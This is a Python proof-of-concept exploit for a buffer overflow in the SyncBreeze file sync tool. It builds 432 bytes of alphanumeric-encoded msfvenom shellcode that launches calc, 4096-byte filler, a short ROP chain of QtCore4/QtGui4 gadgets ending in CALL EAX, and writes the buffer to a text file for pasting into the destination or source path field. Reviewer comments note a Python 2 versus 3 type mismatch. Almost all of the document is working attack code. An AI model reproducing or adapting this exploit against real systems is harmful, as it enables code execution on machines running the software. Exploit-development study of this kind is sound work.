import os
# Execute .py and payload will be generated on file POCPayload.txt
# Open file on notepad and copy ascii output into SyncBreeze DESTINATION or SOURCE PATH on Sync functionality
# badchars
#\x00\x0a\x0d\x2f\x5c\x5d\x5e\x80
#\x81\x82\x83\x84\x85\x86\x87\x88
#\x89\x8A\x8B\x8C\x8D\x8E\x8F\x90
#\x91\x92\x93\x94\x95\x96\x97\x98
#\x99\x9A\x9B\x9C\x9D\x9E\x9F\xA0
#\xA1\xA2\xA3\xA4\xA5\xA6\xA7\xA8
#\xA9\xAA\xAB\xAC\xAD\xAE\xAF\xB0
#\xB1\xB2\xB3\xB4\xB5\xB6\xB7\xB8
#\xB9\xBA\xBB\xBC\xBD\xBE\xBF\xC0
#\xC1\xC2\xC3\xC4\xC5\xC6\xC7\xC8
#\xC9\xCA\xCB\xCC\xCD\xCE\xCF\xD0
#\xD1\xD2\xD3\xD4\xD5\xD6\xD7\xD8
#\xD9\xDA\xDB\xDC\xDD\xDE\xDF\xE0
#\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8
#\xE9\xEA\xEB\xEC\xED\xEE\xEF\xF0
#\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8
#\xF9\xFA\xFB\xFC\xFD\xFE\xFF
# Shellcode payload size: 432 bytes
# Only added a few bad chars to the msfvenom command because alpha_mixed dealt with the rest
# ./msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed BufferRegister=EAX -b '\x89\xe6\xdb\xde\xd9' -v shellcode -f python
# Encoded payload emitted by the msfvenom command above.  It is assembled one
# 11-byte chunk per line: 39 full lines plus a 3-byte tail = 432 bytes, which
# matches the "Shellcode payload size" noted above.  Every byte is in the
# printable range 0x30-0x7a, i.e. none of the bad chars listed above occur.
shellcode = b""
shellcode += b"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
shellcode += b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51"
shellcode += b"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
shellcode += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x39\x6c\x6b"
shellcode += b"\x58\x4d\x52\x43\x30\x33\x30\x67\x70\x35\x30"
shellcode += b"\x6f\x79\x4b\x55\x70\x31\x39\x50\x75\x34\x4e"
shellcode += b"\x6b\x46\x30\x30\x30\x4e\x6b\x72\x72\x74\x4c"
shellcode += b"\x6c\x4b\x52\x72\x32\x34\x4c\x4b\x70\x72\x77"
shellcode += b"\x58\x44\x4f\x48\x37\x72\x6a\x74\x66\x54\x71"
shellcode += b"\x79\x6f\x4c\x6c\x57\x4c\x53\x51\x63\x4c\x75"
shellcode += b"\x52\x66\x4c\x57\x50\x4f\x31\x78\x4f\x56\x6d"
shellcode += b"\x47\x71\x6a\x67\x4d\x32\x58\x72\x53\x62\x70"
shellcode += b"\x57\x4c\x4b\x73\x62\x64\x50\x6e\x6b\x32\x6a"
shellcode += b"\x45\x6c\x4e\x6b\x50\x4c\x37\x61\x73\x48\x6d"
shellcode += b"\x33\x33\x78\x75\x51\x6b\x61\x63\x61\x6c\x4b"
shellcode += b"\x32\x79\x47\x50\x35\x51\x68\x53\x4e\x6b\x57"
shellcode += b"\x39\x57\x68\x68\x63\x74\x7a\x31\x59\x4e\x6b"
shellcode += b"\x65\x64\x4e\x6b\x63\x31\x69\x46\x54\x71\x79"
shellcode += b"\x6f\x4e\x4c\x4f\x31\x58\x4f\x54\x4d\x63\x31"
shellcode += b"\x7a\x67\x67\x48\x69\x70\x64\x35\x6a\x56\x54"
shellcode += b"\x43\x73\x4d\x6b\x48\x37\x4b\x31\x6d\x61\x34"
shellcode += b"\x54\x35\x58\x64\x73\x68\x6c\x4b\x61\x48\x61"
shellcode += b"\x34\x33\x31\x6a\x73\x30\x66\x6e\x6b\x66\x6c"
shellcode += b"\x32\x6b\x4e\x6b\x33\x68\x65\x4c\x47\x71\x69"
shellcode += b"\x43\x6c\x4b\x47\x74\x6c\x4b\x43\x31\x5a\x70"
shellcode += b"\x4f\x79\x52\x64\x74\x64\x65\x74\x61\x4b\x73"
shellcode += b"\x6b\x30\x61\x56\x39\x50\x5a\x63\x61\x69\x6f"
shellcode += b"\x79\x70\x53\x6f\x53\x6f\x33\x6a\x4c\x4b\x37"
shellcode += b"\x62\x48\x6b\x6c\x4d\x63\x6d\x43\x5a\x33\x31"
shellcode += b"\x6c\x4d\x4b\x35\x68\x32\x67\x70\x47\x70\x63"
shellcode += b"\x30\x76\x30\x31\x78\x46\x51\x4c\x4b\x70\x6f"
shellcode += b"\x4d\x57\x69\x6f\x48\x55\x6d\x6b\x78\x70\x4d"
shellcode += b"\x65\x39\x32\x33\x66\x52\x48\x4e\x46\x5a\x35"
shellcode += b"\x4d\x6d\x6d\x4d\x4b\x4f\x6a\x75\x57\x4c\x77"
shellcode += b"\x76\x43\x4c\x37\x7a\x4f\x70\x79\x6b\x4d\x30"
shellcode += b"\x73\x45\x75\x55\x4f\x4b\x43\x77\x62\x33\x64"
shellcode += b"\x32\x72\x4f\x71\x7a\x63\x30\x52\x73\x6b\x4f"
shellcode += b"\x79\x45\x31\x73\x43\x51\x72\x4c\x61\x73\x33"
shellcode += b"\x30\x41\x41"
# Filler of 0x41 so that shellcode + buf is exactly 4096 bytes
# (4096 - 432 = 3664 filler bytes).
# NOTE(review): this literal is a text str, not bytes, while every other piece
# is bytes; the concatenation into `fruit` below therefore raises TypeError on
# Python 3.  The script is presumably written for Python 2, where str and
# bytes are the same type -- confirm the intended interpreter.
buf = "\x41" * (4096-len(shellcode))
# padding for RETN (16 bytes of 0x43)
padding = b"\x43" * 16
# mini rop-chain to place shellcode address into EAX and CALL EAX
# EDX Stores the address of shellcode - 4 and EAX stores 1
# 0x67024662 (RVA : 0x00024662) : # ADD EAX,EDX # RETN ** [QtCore4.dll] ** | ascii {PAGE_EXECUTE_READ}
# Little-endian encoding of the gadget address 0x67024662 quoted above.
addeax = b"\x62\x46\x02\x67"
# INC EAX 3 times to match shellcode address
# 0x65022002 (RVA : 0x00022002) : # INC EAX # RETN ** [QtGui4.dll] ** | ascii {PAGE_EXECUTE_READ}
# Little-endian 0x65022002, repeated 3 times = 12 bytes.
inceax = b"\x02\x20\x02\x65" * 3
# CALL EAX to run shellcode
#65065325 FFD0 CALL EAX
# Little-endian encoding of 0x65065325.
shellcodepivot = b"\x25\x53\x06\x65"
# Final buffer layout (sizes from the definitions above):
#   shellcode (432) + buf (3664) + addeax (4) + padding (16) + inceax (12)
#   + shellcodepivot (4) = 4132 bytes.
# NOTE(review): `os` is imported at the top of the file but never used here.
fruit = shellcode + buf + addeax + padding + inceax + shellcodepivot
# FILE with payload
# Written in binary mode ("wb"), so the bytes go out unchanged.  The handle is
# closed explicitly; a `with open(...)` block would also close it if write()
# raised.
POCPayload = open("POCPayload.txt", "wb")
POCPayload.write(fruit)
POCPayload.close()